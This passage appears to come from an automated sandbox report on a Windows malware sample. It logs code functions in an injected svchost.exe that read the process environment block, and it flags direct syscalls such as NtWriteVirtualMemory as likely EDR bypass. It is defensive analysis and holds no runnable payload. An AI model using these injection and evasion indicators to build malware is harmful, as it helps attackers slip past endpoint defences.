                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365A470 mov eax, dword ptr fs:[00000030h]1_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365A470 mov eax, dword ptr fs:[00000030h]1_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EA456 mov eax, dword ptr fs:[00000030h]1_2_036EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362645D mov eax, dword ptr fs:[00000030h]1_2_0362645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365245A mov eax, dword ptr fs:[00000030h]1_2_0365245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E420 mov eax, dword ptr fs:[00000030h]1_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E420 mov eax, dword ptr fs:[00000030h]1_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E420 mov eax, dword ptr fs:[00000030h]1_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C427 mov eax, dword ptr fs:[00000030h]1_2_0362C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]1_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668402 mov eax, dword ptr fs:[00000030h]1_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668402 mov eax, dword ptr fs:[00000030h]1_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668402 mov eax, dword ptr fs:[00000030h]1_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036304E5 mov ecx, dword ptr fs:[00000030h]1_2_036304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036364AB mov eax, dword ptr fs:[00000030h]1_2_036364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036644B0 mov ecx, dword ptr fs:[00000030h]1_2_036644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BA4B0 mov eax, dword ptr fs:[00000030h]1_2_036BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EA49A mov eax, dword ptr fs:[00000030h]1_2_036EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362CB7E mov eax, dword ptr fs:[00000030h]1_2_0362CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E4B4B mov eax, dword ptr fs:[00000030h]1_2_036E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E4B4B mov eax, dword ptr fs:[00000030h]1_2_036E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03702B57 mov eax, dword ptr fs:[00000030h]1_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03702B57 mov eax, dword ptr fs:[00000030h]1_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03702B57 mov eax, dword ptr fs:[00000030h]1_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03702B57 mov eax, dword ptr fs:[00000030h]1_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6B40 mov eax, dword ptr fs:[00000030h]1_2_036C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6B40 mov eax, dword ptr fs:[00000030h]1_2_036C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FAB40 mov eax, dword ptr fs:[00000030h]1_2_036FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D8B42 mov eax, dword ptr fs:[00000030h]1_2_036D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628B50 mov eax, dword ptr fs:[00000030h]1_2_03628B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DEB50 mov eax, dword ptr fs:[00000030h]1_2_036DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365EB20 mov eax, dword ptr fs:[00000030h]1_2_0365EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365EB20 mov eax, dword ptr fs:[00000030h]1_2_0365EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F8B28 mov eax, dword ptr fs:[00000030h]1_2_036F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F8B28 mov eax, dword ptr fs:[00000030h]1_2_036F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704B00 mov eax, dword ptr fs:[00000030h]1_2_03704B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638BF0 mov eax, dword ptr fs:[00000030h]1_2_03638BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638BF0 mov eax, dword ptr fs:[00000030h]1_2_03638BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638BF0 mov eax, dword ptr fs:[00000030h]1_2_03638BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365EBFC mov eax, dword ptr fs:[00000030h]1_2_0365EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BCBF0 mov eax, dword ptr fs:[00000030h]1_2_036BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03650BCB mov eax, dword ptr fs:[00000030h]1_2_03650BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03650BCB mov eax, dword ptr fs:[00000030h]1_2_03650BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03650BCB mov eax, dword ptr fs:[00000030h]1_2_03650BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630BCD mov eax, dword ptr fs:[00000030h]1_2_03630BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630BCD mov eax, dword ptr fs:[00000030h]1_2_03630BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630BCD mov eax, dword ptr fs:[00000030h]1_2_03630BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DEBD0 mov eax, dword ptr fs:[00000030h]1_2_036DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640BBE mov eax, dword ptr fs:[00000030h]1_2_03640BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640BBE mov eax, dword ptr fs:[00000030h]1_2_03640BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E4BB0 mov eax, dword ptr fs:[00000030h]1_2_036E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E4BB0 mov eax, dword ptr fs:[00000030h]1_2_036E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366CA6F mov eax, dword ptr fs:[00000030h]1_2_0366CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366CA6F mov eax, dword ptr fs:[00000030h]1_2_0366CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366CA6F mov eax, dword ptr fs:[00000030h]1_2_0366CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DEA60 mov eax, dword ptr fs:[00000030h]1_2_036DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036ACA72 mov eax, dword ptr fs:[00000030h]1_2_036ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036ACA72 mov eax, dword ptr fs:[00000030h]1_2_036ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640A5B mov eax, dword ptr fs:[00000030h]1_2_03640A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640A5B mov eax, dword ptr fs:[00000030h]1_2_03640A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366CA24 mov eax, dword ptr fs:[00000030h]1_2_0366CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365EA2E mov eax, dword ptr fs:[00000030h]1_2_0365EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03654A35 mov eax, dword ptr fs:[00000030h]1_2_03654A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03654A35 mov eax, dword ptr fs:[00000030h]1_2_03654A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BCA11 mov eax, dword ptr fs:[00000030h]1_2_036BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366AAEE mov eax, dword ptr fs:[00000030h]1_2_0366AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366AAEE mov eax, dword ptr fs:[00000030h]1_2_0366AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03686ACC mov eax, dword ptr fs:[00000030h]1_2_03686ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03686ACC mov eax, dword ptr fs:[00000030h]1_2_03686ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03686ACC mov eax, dword ptr fs:[00000030h]1_2_03686ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630AD0 mov eax, dword ptr fs:[00000030h]1_2_03630AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03664AD0 mov eax, dword ptr fs:[00000030h]1_2_03664AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03664AD0 mov eax, dword ptr fs:[00000030h]1_2_03664AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638AA0 mov eax, dword ptr fs:[00000030h]1_2_03638AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638AA0 mov eax, dword ptr fs:[00000030h]1_2_03638AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03686AA4 mov eax, dword ptr fs:[00000030h]1_2_03686AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704A80 mov eax, dword ptr fs:[00000030h]1_2_03704A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668A90 mov edx, dword ptr fs:[00000030h]1_2_03668A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03656962 mov eax, dword ptr fs:[00000030h]1_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03656962 mov eax, dword ptr fs:[00000030h]1_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03656962 mov eax, dword ptr fs:[00000030h]1_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367096E mov eax, dword ptr fs:[00000030h]1_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367096E mov edx, dword ptr fs:[00000030h]1_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367096E mov eax, dword ptr fs:[00000030h]1_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D4978 mov eax, dword ptr fs:[00000030h]1_2_036D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D4978 mov eax, dword ptr fs:[00000030h]1_2_036D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BC97C mov eax, dword ptr fs:[00000030h]1_2_036BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0946 mov eax, dword ptr fs:[00000030h]1_2_036B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704940 mov eax, dword ptr fs:[00000030h]1_2_03704940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B892A mov eax, dword ptr fs:[00000030h]1_2_036B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C892B mov eax, dword ptr fs:[00000030h]1_2_036C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE908 mov eax, dword ptr fs:[00000030h]1_2_036AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE908 mov eax, dword ptr fs:[00000030h]1_2_036AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BC912 mov eax, dword ptr fs:[00000030h]1_2_036BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628918 mov eax, dword ptr fs:[00000030h]1_2_03628918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628918 mov eax, dword ptr fs:[00000030h]1_2_03628918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE9E0 mov eax, dword ptr fs:[00000030h]1_2_036BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036629F9 mov eax, dword ptr fs:[00000030h]1_2_036629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036629F9 mov eax, dword ptr fs:[00000030h]1_2_036629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C69C0 mov eax, dword ptr fs:[00000030h]1_2_036C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036649D0 mov eax, dword ptr fs:[00000030h]1_2_036649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FA9D3 mov eax, dword ptr fs:[00000030h]1_2_036FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036309AD mov eax, dword ptr fs:[00000030h]1_2_036309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036309AD mov eax, dword ptr fs:[00000030h]1_2_036309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B89B3 mov esi, dword ptr fs:[00000030h]1_2_036B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B89B3 mov eax, dword ptr fs:[00000030h]1_2_036B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B89B3 mov eax, dword ptr fs:[00000030h]1_2_036B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE872 mov eax, dword ptr fs:[00000030h]1_2_036BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE872 mov eax, dword ptr fs:[00000030h]1_2_036BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6870 mov eax, dword ptr fs:[00000030h]1_2_036C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6870 mov eax, dword ptr fs:[00000030h]1_2_036C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03642840 mov ecx, dword ptr fs:[00000030h]1_2_03642840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660854 mov eax, dword ptr fs:[00000030h]1_2_03660854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634859 mov eax, dword ptr fs:[00000030h]1_2_03634859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634859 mov eax, dword ptr fs:[00000030h]1_2_03634859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]1_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]1_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]1_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov ecx, dword ptr fs:[00000030h]1_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]1_2_03652835
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EAA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00EAA66C
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E981AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E981AC
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E98189 SetUnhandledExceptionFilter,0_2_00E98189

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
